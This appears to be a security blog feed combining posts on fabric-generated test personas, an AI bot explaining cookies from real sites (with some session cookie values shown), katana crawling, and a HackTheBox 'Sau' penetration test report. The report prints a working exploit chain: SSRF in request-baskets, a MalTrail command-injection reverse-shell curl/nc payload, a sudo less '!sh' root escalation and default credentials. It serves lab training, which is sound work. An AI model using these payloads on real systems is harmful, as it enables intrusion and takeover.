  • Social Media Marketing
  • SEO

Personal Interests

  • Cooking
  • Hiking
  • Photography
  • Movies

References

Available upon request.

Seattle, WA - introvert

Let’s try creating an introverted persona :)

$ echo "Seattle, WA. Introvert." | fabric --pattern create_persona

Persona

  • First Name: Evelyn
  • Last Name: Thompson
  • Gender: Female
  • Date of Birth: May 14, 1987 (Age: 36)
  • Billing Address:
    • 3921 Pine Street
    • Seattle, WA 98101
  • Shipping Address:
    • 3921 Pine Street
    • Seattle, WA 98101
  • Phone Number: (206) 555-7392
  • Email: [email protected]
  • Password: E!v3lynT@2023#
  • Username: quiettechie87
  • Payment Card:
    • Type: Visa
    • Number: 4111 1111 1111 1111
    • Expiration Date: 11/25
    • CCV: 823
  • Security Questions:
    • What is your mother’s maiden name? Anderson
    • What was the name of your first pet? Whiskers
    • What was your first car? Honda Civic
  • City of Birth: Portland, OR
  • Cities Lived In:
    • Portland, OR (1987-2009)
    • Bellevue, WA (2009-2014)
    • Seattle, WA (2014-Present)
  • Education History:
    • B.S. in Computer Science, University of Oregon, 2005-2009
    • M.S. in Software Engineering, University of Washington, 2009-2011
  • Job Title: Senior Software Developer
  • Company: SeattleTech Innovations
  • Work Location: Seattle, WA
  • Personal Interests:
    • Reading mystery novels
    • Gardening
    • Coding and tech meetups
  • Personal Bio: Hey, I’m Evelyn! I love spending quiet evenings at home with a good book or tinkering with the latest tech gadgets. When I’m not coding, you can find me in my garden or at a local meetup. I may be an introvert, but I love learning and connecting with like-minded people.
  • Tag Line: “Coding by day, reading by night.”
  • Avatar Pictures:
    • redacted

Professional Resume

Evelyn Thompson

Contact Information

  • Address: 3921 Pine Street, Seattle, WA 98101
  • Phone: (206) 555-7392
  • Email: [email protected]

Objective

Experienced software developer with a strong background in computer science and software engineering. Seeking to leverage my skills in a senior development role at a forward-thinking tech company.

Education

  • M.S. in Software Engineering
    • University of Washington, 2009-2011
  • B.S. in Computer Science
    • University of Oregon, 2005-2009

Professional Experience

  • Senior Software Developer
    • SeattleTech Innovations, Seattle, WA
    • January 2014 - Present
    • Developed and maintained multiple high-traffic web applications.
    • Led a team of 5 developers in agile project management.
    • Implemented new features and optimized existing code for better performance.
  • Software Developer
    • Tech Solutions, Bellevue, WA
    • June 2011 - December 2013
    • Worked on backend systems and API integrations.
    • Collaborated with front-end developers to ensure seamless user experiences.
    • Participated in code reviews and contributed to team knowledge sharing.

Skills

  • Programming Languages: Python, JavaScript, C++
  • Frameworks: Django, React, Node.js
  • Tools: Git, Docker, Jenkins
  • Soft Skills: Team Leadership, Problem Solving, Communication

Personal Interests

  • Reading mystery novels
  • Gardening
  • Coding and tech meetups

References

Available upon request.

Other Examples

I could go on for a while, it’s kinda fun in a nerdy, introverted sort of way. :D

Here are some other examples I’ve tried, but without the long output:

  • Atlanta, GA. trip.com - will produce personas who are interested in travel
  • etsy.com - crafters unite!
  • Kansas City, MO. minecraft.com - the other kind of crafters
  • male body builder
  • age 13, age 25, age 53, … - age-specific personas with slang

I hope this makes your bug hunting or other testing more realistic and frees up some time.

]]>
AI Bot for Explaining Cookies2024-09-04T21:00:00+00:002024-09-04T21:00:00+00:00https://double16.github.io/l/2024/09/04/fabric-patterns-cookies-explainArtificial Intelligence (AI) gets a lot of attention. I was skeptical at first, but after using ChatGPT instead of DuckDuckGo, I was impressed. After asking it to write some code for me, I was really impressed. I recently watched Practical AI for Bounty Hunters. Wow.

Jason Haddix presented using fabric to produce AI bots for security research. Do watch the video. He is a good presenter and there is so much useful information you’ll likely watch it more than once.

I wrote an AI bot to explain the cookies used by a site. The code is available in my GitHub at https://github.com/double16/fabric. The examples are from public sites, no vulnerabilities are exposed, so this is legal and ethical.

When running the bot, check the last comment in the pattern for recommended fabric arguments. They significantly affect the outcome.

trip.com

I was an authenticated user on trip.com when I saved the raw request and response using ZAP. The format is the same as Burp Suite. It includes all of the request and response headers and bodies. The bot is able to extract cookies from it.

$ cat trip.raw | fabric --pattern explain_cookies --temperature=.2 --presencepenalty=.2 --stream

The results were better than I expected!

  • UBT_VID: This cookie seems to be used for tracking user behavior on the website. The value 1724669840943.2043fLOxwGsP appears to be a unique identifier, possibly combining a timestamp with a random string for uniqueness.

  • ibu_online_jump_site_result: Stores JSON data indicating user preferences or actions related to site navigation. The value {"site_url":[],"suggestion":["en-us","","es-us"]} suggests it’s used to manage language or regional settings and suggestions.

  • ibulanguage and ibulocale: Both cookies (EN and en_us respectively) are straightforward, storing the user’s language and locale preferences, which help in customizing the user interface according to the user’s preferred language.

  • cookiePricesDisplayed: Stores the currency preference (USD) for displaying prices, ensuring that the user sees prices in their chosen currency consistently across the site.

  • _abtest_userid: Contains a UUID 6913d6ac-7bb1-4e89-ba0d-33858f62ac07, likely used to identify a user in A/B testing scenarios to deliver consistent experiment experiences.

  • _gid, _gcl_au, _ga, _ga_2DCSB93KS4, _ga_37RNVFDP1J, _ga_X437DZ73MR: These are Google Analytics cookies used to distinguish users and sessions for analytics purposes. The values are identifiers and timestamps related to user sessions and interactions.

  • _tt_enable_cookie and _ttp: Related to tracking technologies, possibly for advertising or user behavior tracking. The values 1 and o2HwmvRJ9YAEV4WeLYhEOgxmzD6 suggest an enabled state and a unique tracking ID.

  • _RSG, _RDG, _RGUID: Seem to be related to session or user identification with specific values like hpas6yHluMDYVCpjKpIO39 and d5b8bd1f-06da-4ceb-90d8-4b352dccc7e2 which could be used internally for maintaining user session states or logs.

  • GUID: 09034024316925335983 appears to be a globally unique identifier for the user or session, critical for linking back-end processes to the user.

  • login_type, login_uid, DUID: These cookies (0, B2E7EBBB91A228E959D2AE549E4265610FC51D2A7E3F2BBD187B34B46FE68E99C4288992DDE5C7C3369410D38AE6B9F4, u=6D6E7DE4CA24C7AD5F0E32C02BACD288C3473027A632936E861D6B4023D2505C&v=0) are highly sensitive as they relate to user authentication and device identification. Exposure of these values can lead to account takeover or identity theft.

  • _udl: Appears to be an encrypted or hashed value CC0F7EF1FB3BF3A3EA7122B403EF204C, possibly related to user login or session details, indicating a high confidentiality requirement.

  • _bfa, _bfi, _bfaStatusPVSend, _bfaStatus: These cookies are likely used for analytics or fraud detection, with values indicating various statuses and identifiers for tracking user interactions and behaviors.

The interaction between cookies like _ga, _gid, _gcl_au (all Google Analytics), and _abtest_userid suggests a comprehensive tracking system for user behavior analysis and site optimization based on user activities. The GUID and login-related cookies interact to maintain session integrity and secure user authentication processes.

Security Concerns

The most sensitive cookies here are login_uid, DUID, and _udl, which should be protected to prevent session hijacking and identity theft. The use of HTTPS is crucial to protect these cookies from being exposed during data transmission. Additionally, setting cookies with the HttpOnly and Secure flags would help mitigate the risk of client-side script access and ensure they are sent over secure channels, respectively. The exposure of these values can lead to significant security breaches, including unauthorized access to user accounts and personal data.
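
For reference, those flags appear on the Set-Cookie response header. The value below is a placeholder, not one of trip.com’s real cookies:

```http
Set-Cookie: login_uid=REDACTED; Path=/; Secure; HttpOnly; SameSite=Lax
```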

6sense.com

Let’s try another one, except using the HTTP Archive Format (HAR). It is a JSON format supported by many tools. Chrome and Firefox support saving this format from dev tools, as well as ZAP and Burp Suite.
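
Since HAR is just JSON, you can peek at which cookies a capture contains before handing it to the bot. A jq sketch, assuming a saved capture named 6sense-vdp.har:

```shell
# List the distinct cookie names recorded in a HAR capture.
jq -r '.log.entries[].request.cookies[].name' 6sense-vdp.har | sort -u
```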

$ cat 6sense-vdp.har | fabric --pattern explain_cookies --temperature=.2 --presencepenalty=.2  --stream
  • __cf_bm: This cookie is associated with Cloudflare and is used to distinguish between humans and bots. This is beneficial for the website, to make valid reports on the use of their site. It also contains a unique ID that Cloudflare uses to identify individual clients behind a shared IP address and apply security settings on a per-client basis.

  • __q_state_nev3mYP3YV7DaW2F: Appears to be a custom cookie used to store state information in a JSON encoded format. The value includes a UUID and a domain, suggesting it’s used for tracking user sessions or preferences across the domain “6sense.com”.

  • _fbp: This cookie is set by Facebook to deliver advertisement products such as real time bidding from third party advertisers. It contains identifiers for the browser and a unique visitor ID.

  • _ga: This Google Analytics cookie is used to distinguish unique users by assigning a randomly generated number as a client identifier. It is included in each page request in a site and used to calculate visitor, session and campaign data for the sites analytics reports.

  • _ga_311340212, _ga_JKCB2CTS3D, _ga_Q57CXMB28P: These are Google Analytics cookies used to manage user sessions. They typically contain timestamp details of when a visitor enters and leaves the website, along with session identifiers.

  • _gcl_au: Used by Google AdSense for experimenting with advertisement efficiency across websites using their services.

  • ketch_consent_v1: This cookie seems to be related to managing user consent for various services and tracking. The encoded value suggests detailed consent preferences for analytics, advertising, and functional services.

  • _mkto_trk: This cookie is associated with an email marketing service provided by Marketo. It tracks the visitor’s identity and behavior on the website to optimize the relevance of marketing campaigns.

  • _pf_id.c97b and _pf_ses.c97b: Likely used for tracking user behavior and session details. The complex structure suggests it includes timestamps, unique identifiers, and possibly session states.

  • swb and _swb_consent: These cookies seem to manage user consent settings for various tracking or functional services, possibly related to a web-based application or service.

  • _uetsid and _uetvid: These cookies are used by Microsoft Bing Ads and are used for tracking the success of advertising campaigns on Bing.

  • cf_clearance: This cookie is related to Cloudflare and is used to bypass security restrictions based on the visitor coming from a trusted IP address.

  • mutiny.user.session, mutiny.user.session_number, mutiny.user.token: These appear to be custom cookies used to manage user sessions and authentication tokens, likely for maintaining session state and security across page requests.

  • vid: Likely a unique visitor ID, used for tracking purposes to distinguish different visitors.

The interactions between these cookies are primarily focused on tracking, user identification, session management, and advertising. For instance, Google Analytics cookies (_ga, _ga_311340212, _ga_JKCB2CTS3D, _ga_Q57CXMB28P) work together to provide a comprehensive view of how users interact with the site over time. The _fbp and _gcl_au cookies interact by contributing data for advertising efficiency analytics. The mutiny.user.* cookies interact to maintain a secure and continuous user session.

Security Concerns

  1. Exposure of Session Tokens: Cookies like mutiny.user.token carry session tokens which, if exposed, could allow an attacker to hijack a user’s session.
  2. Third-Party Tracking: Cookies such as _fbp and Google Analytics cookies can track user behavior across different sites, which raises privacy concerns.
  3. Persistent Identifiers: Cookies like vid and _uetvid that serve as persistent identifiers can be used to track users over long periods, potentially infringing on privacy if not properly managed and disclosed.
  4. Encryption and Encoding: Values in cookies like ketch_consent_v1 are encoded, which is good for security. However, it’s crucial that sensitive information is not only encoded but encrypted to prevent unauthorized access.

It’s essential for users to be aware of these cookies, understand their purpose, and manage their consent preferences to protect their privacy and data integrity.

Conclusion

I could search all of these cookie names myself. At some point I will have seen enough of them to know them from memory. The value add is that this bot is a single command and the output is great for pasting into notes. How much time would I spend searching, researching and assembling this myself? I will certainly be using AI bots moving forward. I will be adding to https://github.com/double16/fabric as I develop more bots.

]]>
Crawling Large Sites2024-09-03T16:38:10+00:002024-09-03T16:38:10+00:00https://double16.github.io/l/2024/09/03/crawling-large-sitesI’ve been working on bug bounties and the tools I use for crawling HackTheBox machines do not scale well for large, public sites. These are a few things I’ve learned, and my methodology will improve as time goes on.

GUI Tools Choke

My go-to intercepting proxy is ZAP. I won’t give an exhaustive explanation of my choice, but I’ll mention a few things. ZAP performs passive scanning as a site is browsed or crawled (aka spidered), which generates a lot of useful alerts. The requests and responses, including headers and bodies, can be searched for content. It would be advantageous to scan a large site this way. Burp Suite has similar features.

The issue is that crawling a large site can approach tens or hundreds of thousands of requests. Excluding out-of-scope domains from the proxy helps, but it isn’t enough. At this number of requests, operations slow down until the tool is unusable. Opening and closing the ZAP session is slow. I’ve also experienced ZAP or my VM crashing and corrupting the session file. That is a lot of work lost.

Command Line

My solution is to not use ZAP or Burp Suite for crawling; I save those tools for manual work. Instead, I use the command line tool katana to crawl the entire site. The results are stored as JSON Lines in a text file, and command line tools can be used to digest the data.

Passive Crawling

Passive crawling queries sites like The Wayback Machine for historical URLs instead of requesting the target directly. The -passive argument enables this feature.

katana -u https://example.com -passive
  -omit-raw -omit-body
  -o katana-passive-example.com.json -jsonl
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0'

Crawling

katana -u https://example.com -js-crawl -jsluice -known-files all
  -field-scope fqdn -display-out-scope
  -form-extraction -ignore-query-params -strategy breadth-first
  -omit-raw -omit-body 
  -rate-limit 6
  -o katana-example.com.json -jsonl
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0' -retry 3

Headless Crawling

Headless crawling uses the Chromium browser to crawl the site. For dynamic web sites this may yield more results. The -headless argument enables this feature.

katana -u https://example.com -headless -js-crawl -jsluice -known-files all
  -field-scope fqdn -display-out-scope
  -form-extraction -ignore-query-params -strategy breadth-first
  -omit-raw -omit-body
  -rate-limit 6
  -depth 5 -retry 3
  -o katana-headless-example.com.json -jsonl

Argument Description

Read the katana docs to fully understand its options and behavior. These are the ones I’ve found useful so far.

Argument Description
-js-crawl Scans javascript for URLs.
-jsluice Uses the jsluice library to extract more URLs.
-known-files all Look for robots.txt, sitemap.xml, etc.
-field-scope fqdn Don’t crawl outside of the fully qualified domain.
-display-out-scope Output links to out of scope URLs without accessing them.
-form-extraction Extract form data.
-ignore-query-params Ignore query params when determining if a URL has been visited. Keeps the scan from growing out of control.
-strategy breadth-first Most features of a site are identified by the first or second depth of the path. This option discovers these earlier.
-omit-raw Omit the raw request/response data, otherwise local files can grow large.
-omit-body Omit the raw request/response bodies, otherwise local files can grow large.
-rate-limit 6 Limit to 6 requests per second. Attempts to prevent being blocked or overwhelming the site.
-o The output file
-jsonl JSON Line output, each line is a JSON document for a request and response.
-H Specifies an HTTP header, in this case a custom user agent.

Analyzing

The output is a JSON payload, one request/response per line, perfect for command line tools.

jq is the primary tool I use to extract fields. For example, to get a list of all visited URLs, one per line:

cat katana-example.com.json | jq -r .request.endpoint

To extract parts of the URL, use TomNomNom’s unfurl:

cat katana-example.com.json | jq -r .request.endpoint | unfurl paths

TomNomNom uses the command line a lot and has developed tools that help with this approach. Check out his GitHub. Here’s a video where I enjoyed watching his command line skills: NahamSec.

ZAP and Burp Suite both allow importing a text file of URLs. Once I have a set of URLs I want to investigate further, I import into ZAP.
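
Building that import file is one more pipe. A sketch assuming the katana output file from above; the output filename is my own convention:

```shell
# Deduplicated URL list, ready for ZAP's or Burp's URL import.
jq -r .request.endpoint katana-example.com.json | sort -u > urls-example.com.txt
```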

Conclusion

When working with sites at large scale, I need to get creative instead of wasting time waiting for tools to run. ZAP has a command line mode and docker image that I plan to experiment with to see if I can get it to perform passive scans at scale.
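
As a starting point for that experiment, the ZAP project ships a baseline scan script in its docker image. A sketch, with the image tag and script name per the ZAP docs at the time of writing and a placeholder target:

```shell
# Passive-only baseline scan: spiders the target and reports
# passive-scan alerts without actively attacking it.
docker run --rm -t ghcr.io/zaproxy/zaproxy:stable zap-baseline.py \
    -t https://example.com
```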

]]>
HackTheBox Sau Report2024-06-12T00:00:00+00:002024-06-12T00:00:00+00:00https://double16.github.io/l/2024/06/12/hackthebox-lab-sauHackTheBox “Sau” Machine
Penetration Test Report

Patrick Double
[email protected]
https://www.linkedin.com/in/patrick-double-28b44149/


Executive Summary

Purpose and Scope

“Sau is an Easy Difficulty Linux machine that features a Request Baskets instance …”

The goal was to identify security vulnerabilities within the machine, exploit the vulnerabilities to retrieve flags user.txt and root.txt, and identify mitigations.

Risks

Full System Compromise (High Impact)

A full system compromise provides a computer under attacker control in the network.

Modification of Sensitive Application

Maltrail is a malicious traffic detection system. An attacker could change configuration or disable the application such that malicious traffic is no longer detected.

Recommendations

This section gives general recommendations that will reduce the risk of the findings occurring in the future. Recommendations specific to each finding are detailed in the next section.

Regular Patching

A regular patching schedule should be maintained for all installed software.

Password Requirements

Strong password requirements should be enforced.

Vulnerability Scanning

Using a vulnerability scanner on deployment environments may find configuration errors, such as several of the HTTP cookie and header findings detailed below.

Findings

Finding ID CWE Risk/Impact Description
HTBSAU-2024-01 918 High/High CVE-2023-27163 SSRF in request-baskets
HTBSAU-2024-02 77 High/High MalTrail 0.53 Command Injection RCE
HTBSAU-2024-03 205 High/High CVE-2023-26604 Privilege Escalation
HTBSAU-2024-04 1392 High/Medium MalTrail Default Credentials
HTBSAU-2024-05 352 Medium/Medium Missing CSRF Token
HTBSAU-2024-06 693 Medium/Medium CSP: Unsafe Configuration
HTBSAU-2024-07 693 Medium/Medium Missing Content Security Policy Header
HTBSAU-2024-08 345 Medium/Medium Sub Resource Integrity Attribute Missing
HTBSAU-2024-09 829 Medium/Medium Vulnerable JS Library: moment.js 2.10.6
HTBSAU-2024-10 1021 Low/Medium Missing Anti-clickjacking Header

HTBSAU-2024-01 CVE-2023-27163 SSRF in request-baskets

Observation

The request-baskets 1.2.1 application has a known vulnerability that the tester successfully exploited.

Affected Components

  • Web application on port 55555 (request-baskets 1.2.1)
Description

“request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.”

The tester succeeded in gaining access to an internal web service running on the default HTTP port. Any HTTP service accessible to the sau.htb machine, including those not accessible to the public Internet, could be accessed using this vulnerability.

Mitigation

Upgrade request-baskets to a patched version.

Validation

Create a new basket and configure it to forward to http://localhost:80. Verify the MalTrail application is not available.
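
For a repeatable check, the basket can be created through the request-baskets REST API rather than the UI. A sketch based on the documented API; the basket name and flags here are examples:

```shell
# Create a basket that forwards to the internal web service and
# proxies the response back to the caller.
curl -s -X POST 'http://sau.htb:55555/api/baskets/ssrftest' \
    -H 'Content-Type: application/json' \
    -d '{"forward_url":"http://localhost:80","proxy_response":true,"expand_path":true,"insecure_tls":false}'

# On a vulnerable version, requests to the basket now return the
# internal service; a patched version should not.
curl -s 'http://sau.htb:55555/ssrftest/'
```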

References

HTBSAU-2024-02 MalTrail 0.53 Command Injection RCE

Observation

The MalTrail application was exposed through the SSRF vulnerability described in HTBSAU-2024-01. MalTrail is running version 0.53, which is vulnerable to remote code execution (RCE) via command injection.

Affected Components

  • Web application on sau.htb running on http://localhost:80/

Description

“Command injection vulnerabilities typically occur when:

  1. Data enters the application from an untrusted source.
  2. The data is part of a string that is executed as a command by the application.
  3. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have.”

The tester was able to execute arbitrary operating system commands leading to a reverse shell.

Mitigation

Upgrade MalTrail to a patched version.

Validation

  1. Configure a basket detailed in HTBSAU-2024-01
  2. On the attacking machine run nc -nlvp 9090
  3. On another shell on the attacking machine run, changing the bucket name and attacker IP address.
    curl 'http://sau.htb:55555/mfaos3m/login' --data 'username=;`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%25261|nc 10.10.14.87 9090 >/tmp/f`'
    
  4. A vulnerable version will connect back to the nc command
    $ nc -nlvp 9090
    listening on [any] 9090 ...
    connect to [10.10.14.87] from (UNKNOWN) [10.129.229.26] 56694
    /bin/sh: 0: can't access tty; job control turned off
    $
    

References

HTBSAU-2024-03 CVE-2023-26604 Privilege Escalation

Observation

The Ubuntu operating system on sau.htb is running an unpatched version. The version has vulnerability CVE-2023-26604 that affects system services run using sudo.

Affected Components

  • Ubuntu 20.04.6 LTS on sau.htb

Description

The puma user was compromised by HTBSAU-2024-02. This user is allowed to run the following command:

$ sudo /usr/bin/systemctl status trail.service

When the output needs to be paged, the less program is used. This program allows command execution, and it is running as the root user.

Mitigation

Upgrade Ubuntu to a patched version.

Validation

  1. Login as the puma user
  2. Execute the following commands:
    $ stty columns 200 rows 10
    $ sudo /usr/bin/systemctl status trail.service
    !sh
    
  3. On a vulnerable system, the !sh input to the less program will result in a shell
    !sh
    # id
    uid=0(root) gid=0(root) groups=0(root)
    #
    

References

HTBSAU-2024-04 MalTrail Default Credentials

Observation

The MalTrail application was exposed through the SSRF vulnerability described in HTBSAU-2024-01. It is configured with default credentials for the admin account.

Affected Components

  • Web application on sau.htb running on http://localhost:80/

Description

“It is common practice for products to be designed to use default keys, passwords, or other mechanisms for authentication. The rationale is to simplify the manufacturing process or the system administrator’s task of installation and deployment into an enterprise. However, if admins do not change the defaults, it is easier for attackers to bypass authentication quickly across multiple organizations.”

Mitigation

Change the password for the admin user as part of the install process. Create a password rotation policy to mitigate compromise of the password.

Validation

  1. Configure a basket detailed in HTBSAU-2024-01
  2. Open a web browser to the basket URL
  3. Enter the user admin and password changeme! and click Log In
  4. A vulnerable password will successfully login

References

HTBSAU-2024-05 Missing CSRF Token

Observation

The tester observed the web application on port 55555 does not use a CSRF (Cross-Site Request Forgery) token.

Affected Components

  • Web application on port 55555

Description

“When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.”

Mitigation

If the alert is present after upgrading request-baskets, contact the authors and request implementation of CSRF protection.

Validation

Use a web application scanner to detect the presence of CSRF protection. Use a web application proxy, such as ZAP, to intercept requests and modify the CSRF token. A proper implementation will refuse to process the request if the token is modified.
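A quick static check can complement the proxy-based test: scan returned forms for a hidden token field. This is a heuristic sketch only; the class and the field-name matching are illustrative, since token names vary by framework.

```python
from html.parser import HTMLParser

class CSRFTokenFinder(HTMLParser):
    """Collect hidden <input> names that look like CSRF tokens (heuristic)."""
    def __init__(self):
        super().__init__()
        self.tokens = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden" and "csrf" in a.get("name", "").lower():
            self.tokens.append(a["name"])

finder = CSRFTokenFinder()
finder.feed('<form><input type="hidden" name="csrf_token" value="abc"><input name="q"></form>')
print(finder.tokens)  # ['csrf_token']
```

An empty result on a state-changing form is a signal worth confirming with the proxy test above.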

References

HTBSAU-2024-06 Content Security Policy: Unsafe Configuration

Observation

The request-baskets 1.2.1 software has an unsafe content security policy:

  • Wildcard Directive
  • script-src unsafe-eval
  • style-src unsafe-inline

Affected Components

  • Web application on port 55555

Description

“Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft, to site defacement, to malware distribution.”

Mitigation

If the alert is present after upgrading request-baskets, contact the authors and request implementation of a more strict CSP.

Validation

Use a web application scanner to detect the unsafe configuration.
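The three alerts above can also be read straight off the Content-Security-Policy header value. A minimal checker sketch (the function name is hypothetical; the directive and keyword syntax follows the CSP specification):

```python
def unsafe_csp_directives(policy):
    """Flag CSP source values that are wildcards or unsafe keywords."""
    findings = []
    for directive in filter(None, (d.strip() for d in policy.split(";"))):
        name, *sources = directive.split()
        for src in sources:
            if src == "*" or src in ("'unsafe-eval'", "'unsafe-inline'"):
                findings.append(f"{name} {src}")
    return findings

# The example policy mirrors the three alerts reported above.
print(unsafe_csp_directives("default-src *; script-src 'self' 'unsafe-eval'; style-src 'unsafe-inline'"))
```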

References

HTBSAU-2024-07 Missing Content Security Policy Header

Observation

The tester observed the web application does not provide a CSP (Content Security Policy) in some cases.

Affected Components

  • Web application on port 55555

Description

“Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft, to site defacement, to malware distribution.”

Mitigation

If the alert is present after upgrading request-baskets, contact the authors and request including a proper CSP header for every request.

Validation

The Firefox dev tools can be used to inspect the response of requests to the applications. Look for the Content-Security-Policy HTTP headers.

References

HTBSAU-2024-08 Sub Resource Integrity Attribute Missing

Observation

The tester observed that the web application includes sub-resources without Subresource Integrity attributes.

Affected Components

  • Web application on port 55555

Description

“Subresource Integrity (SRI) is a security feature that enables browsers to verify that resources they fetch (for example, from a CDN) are delivered without unexpected manipulation. It works by allowing you to provide a cryptographic hash that a fetched resource must match.”

Mitigation

If the alert is present after upgrading request-baskets, contact the authors and request use of sub-resource integrity attributes.

Validation

Use a web application scanner to detect missing sub-resource integrity attributes.
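The integrity value a page should carry is just a base64-encoded digest of the resource. A sketch of generating one for a downloaded copy of a script such as moment.js (the sample bytes here stand in for the file contents):

```python
import base64
import hashlib

def sri_hash(resource: bytes) -> str:
    """Compute a Subresource Integrity value (sha384) for a resource's bytes."""
    digest = hashlib.sha384(resource).digest()
    return "sha384-" + base64.b64encode(digest).decode()

# The resulting value goes in the script tag's integrity attribute.
print(sri_hash(b"console.log('hi');"))
```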

References

HTBSAU-2024-09 Vulnerable JS Library: moment.js 2.10.6

Observation

The client side dependency moment.js is a vulnerable version.

Affected Components

  • Web application on port 55555

Description

“When including third-party functionality, such as a web widget, library, or other source of functionality, the product must effectively trust that functionality. Without sufficient protection mechanisms, the functionality could be malicious in nature (either by coming from an untrusted source, being spoofed, or being modified in transit from a trusted source). The functionality might also contain its own weaknesses, or grant access to additional functionality and state information that should be kept private to the base system, such as system state information, sensitive application data, or the DOM of a web application.”

Mitigation

If the alert is present after upgrading request-baskets, contact the authors and request upgrading the moment.js dependency.

Validation

Use a web application scanner to detect vulnerable client side dependencies.

References

HTBSAU-2024-10 Missing Anti-clickjacking Header

Observation

The tester observed a lack of HTTP headers mitigating clickjacking attacks.

Affected Components

  • Web application on port 55555

Description

“Clickjacking (classified as a user interface redress attack or UI redressing) is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer.”

Mitigation

For the application on port 55555, implement a CSP including frame-ancestors or the X-Frame-Options header.

Validation

The Firefox dev tools can be used to inspect the response of requests to the applications. Look for the frame-ancestors value in the Content-Security-Policy HTTP header, or the X-Frame-Options header.
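The same check can be scripted over a response's headers; a minimal sketch (the function name and header dictionaries are illustrative):

```python
def clickjacking_protected(headers):
    """True if a response carries X-Frame-Options or a CSP frame-ancestors directive."""
    h = {k.lower(): v for k, v in headers.items()}
    if "x-frame-options" in h:
        return True
    return "frame-ancestors" in h.get("content-security-policy", "")

print(clickjacking_protected({"Content-Security-Policy": "frame-ancestors 'none'"}))  # True
print(clickjacking_protected({"Server": "nginx"}))                                    # False
```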

References

Methodology

The tester employed an industry recognized method for conducting penetration testing. Below is a detailed account of how the tester identified and exploited the target, including all individual vulnerabilities discovered.

Discovery

The IP address for this machine is 10.129.44.233. The typical host name for Hack the Box machines is the name of the machine and a TLD of htb. Add this to /etc/hosts as:

10.129.44.233 sau.htb

Service Enumeration

The tester enumerated network services using nmap.

$ nmap -p- -sV -sC -oN nmap-tcp-all.txt -oX nmap-tcp-all.xml 10.129.44.233

The interesting services are:

Port   Service  Product
22     ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.7
55555  http     unknown

TCP 55555 HTTP

To prepare for enumerating the http endpoints, the tester started and configured ZAP to intercept and inspect traffic.

The web application is running request-baskets version 1.2.1.

The tester verified a new basket can be created.

Vulnerabilities

SSRF in request-baskets, CVE-2023-27163

By performing a search, the tester found a CVE in request-baskets version 1.2.1.

Configuring the basket to forward to http://localhost:80/ revealed the MalTrail login page.
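Under the hood this forwarding is a single call to the request-baskets API. The sketch below constructs (but does not send) that request; the endpoint and configuration fields follow the public proof of concept for CVE-2023-27163, and the basket name mfaos3m matches the one used later in this report.

```python
import json
from urllib.request import Request

# Basket configuration that forwards requests to the internal service and
# proxies the responses back; field names follow the public PoC for CVE-2023-27163.
config = {
    "forward_url": "http://localhost:80/",
    "proxy_response": True,
    "insecure_tls": False,
    "expand_path": True,
    "capacity": 250,
}
req = Request(
    "http://sau.htb:55555/api/baskets/mfaos3m",
    data=json.dumps(config).encode(),
    headers={"Content-Type": "application/json"},
    method="POST",
)
print(req.get_method(), req.full_url)  # constructed here, not sent
```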

Default Credentials

The tester searched for any default credentials for MalTrail and found admin:changeme!. The credentials worked. Accessing the application only through the basket forwarding limited its usability.

MalTrail 0.53 RCE

A search for exploits for MalTrail 0.53 revealed a remote code execution exploit.

https://huntr.com/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/

Exploitation

MalTrail 0.53 RCE

The basket name mfaos3m will need to be changed to match the one created above.

$ nc -nlvp 9090

$ curl 'http://sau.htb:55555/mfaos3m/login' --data 'username=;`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%25261|nc 10.10.14.87 9090 >/tmp/f`'

$ nc -nlvp 9090
listening on [any] 9090 ...
connect to [10.10.14.87] from (UNKNOWN) [10.129.229.26] 56694
/bin/sh: 0: can't access tty; job control turned off
$
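The %2526 sequence in the payload is worth a note: it is an ampersand URL-encoded twice, so that 2>&1 survives an extra round of decoding introduced by the basket forwarding (my reading of why the payload is double-encoded). A quick check of the decoding:

```python
from urllib.parse import unquote

# "%2526" is "&" encoded twice: the first decode yields "%26",
# the second yields "&", reconstructing the shell redirection "2>&1".
payload = "2>%25261"
once = unquote(payload)   # -> "2>%261"
twice = unquote(once)     # -> "2>&1"
print(once, twice)
```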

The user.txt file is found in this user’s home directory.

$ whoami
puma
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:a0:f6 brd ff:ff:ff:ff:ff:ff
    inet 10.129.229.26/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2299sec preferred_lft 2299sec
    inet6 dead:beef::250:56ff:feb0:a0f6/64 scope global dynamic mngtmpaddr 
       valid_lft 86394sec preferred_lft 14394sec
    inet6 fe80::250:56ff:feb0:a0f6/64 scope link 
       valid_lft forever preferred_lft forever
$ hostname
sau
$ cd
$ pwd
/home/puma
$ ls
user.txt

Discovery of puma@sau.htb

The tester stabilized the shell for easier discovery.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
